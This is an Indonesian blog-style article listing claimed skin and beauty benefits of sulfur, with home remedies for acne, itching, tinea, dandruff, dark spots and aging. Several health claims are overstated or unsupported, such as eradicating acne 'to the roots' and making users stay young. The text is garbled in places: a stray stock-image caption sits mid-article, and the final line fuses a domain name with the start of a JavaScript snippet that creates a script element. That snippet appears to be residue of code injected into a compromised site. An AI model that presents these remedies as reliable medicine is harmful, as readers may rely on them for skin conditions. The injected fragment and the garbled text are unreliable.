Manfaat Belerang Untuk Kesehatan Kulit dan Kecantikan

Belerang atau sulfur merupakan bahan mineral alami yang berasal dari proses vulkanisme. Belerang memang memiliki bau yang agak kurang sedang, akan tetapi belerang memiliki manfaat yang luar biasa terutama untuk kesehatan kulit kita. Nah, kali ini kami akan membahas tentang Manfaat belerang untuk kesehatan kulit dan kecantikan.

Belerang bukan zat kimia yang dapat membahayakan diri anda, belerang merupakan mineral alami yang bermanfaat untuk kulit anda. Belerang memiliki banyak manfaat bagi kecantikan dan kesehatan kulit.

belerang

Ampule and syringe on abstract coloured background.

Berikut ini adalah beberapa manfaat belerang untuk kesehatan kulit tubuh dan wajah secara alami.

1. Belerang dapat mengobati masalah jerawat
Banyak orang yang memiliki masalah dengan kulit berjerawat, baik itu jerawat di wajah maupun jerawat di punggung. Bahan belerang memiliki sifat anti bakteri sehingga dapat membunuh bakteri dan kuman yang menyebabkan berkembangnya jerawat di wajah. Anda bisa melakukan perawatan menggunakan masker belerang secara rutin untuk menghilangkan jerawat sampai ke akar-akarnya, dan juga mencegah timbul jerawat baru.

2. Belerang dapat mengobati masalah gatal-gatal pada kulit

Masalah gatal-gatal pada kulit bisa di sebabkan karena adanya bakteri dan kuman, dan jika tidak segera di atasi maka bisa menyebabkan iritasi karena sering di garuk, dan yang paling parah adalah infeksi. Oleh karena itu kita harus segera mengatasinya, dan salah satu caranya yaitu dengan menggunakan belerang. Untuk menyembuhkan penyakit gatal-gatal anda bisa berendam di air hangat yang mengandung belerang selama kurang lebih 30 menit. Lakukanlah minimal 2 minggu sekali agar masalah gatal-gatal pada kulit bisa segera teratasi.

3. Belerang dapat mengatasi panu dan kurap

Memiliki panu dan kurap tentu akan merusak kecantikan kulit anda, dan bisa membuat seseorang menjadi tidak percaya diri. Nah.. bahan belerang juga bermanfaat untuk mengatasi masalah panu dan kurap. Anda bisa mencampurkan bubuk belerang dengan minyak sayur, kemudian mengoleskannya pada bagian kulit yang ada panu / kurapnya. Lakukanlah secara rutin supaya mendapatkan hasil yang memuaskan.

4. Mencegah pori-pori terbuka lebar

Belerang dapat mencegah pori-pori anda terbuka dengan lebar. pori-pori tersumbat karena faktor-faktor yang berbeda karena deposisi sabun yang berlebihan, kotoran dan make up di wajah. anda hanya perlu mencuci muka anda dengan belerang. maka kulit anda akan terangkat semua kotoran-kotorannya dan kulit akan terasa lebih fresh

5. Mengatasi ketombe pada kepala

Ketombe sering kali menggagu kepala kita, kita menjadi tidak bebas untuk mengekspresikan diri. Masalah tersebut sangat umum terjadi pada setiap manusia. Belerang juga dapat menjadi salah satu solusi untuk mengatasi ketombe.

6. Mengatasi noda-noda hitam di wajah

Adanya noda hitam pada wajah yang biasanya diakibatkan oleh jerawat ataupun kerutan pada wajah pasti itu akan mengganggu penampilan anda, belerang merupakan salah satu bahan alami yang dapat anda coba untuk menghilangkan noda hitam tersebut.

7. Awet muda

Dengan memanfaatkan mineral dari belerang anda dapat lebih awet muda. Ini dikarenakan kandungan unsur di dalam belerang mampu menghasilkan dan membuat kulit lebih halus, sehingga menekan terjadinya keriput pada kulit wajah.

Demikianlah beberapa manfaat dari belerang untuk kulit dan kecantikan, semoga bermanfaat untuk anda. Sebelum anda menggunakan belerang lebih baik anda berkonsultasi terlebih dahulu kepada dokter atau ahli kulit.

@evoucher.co.idvar d=document;var s=d.createElement(‘script’);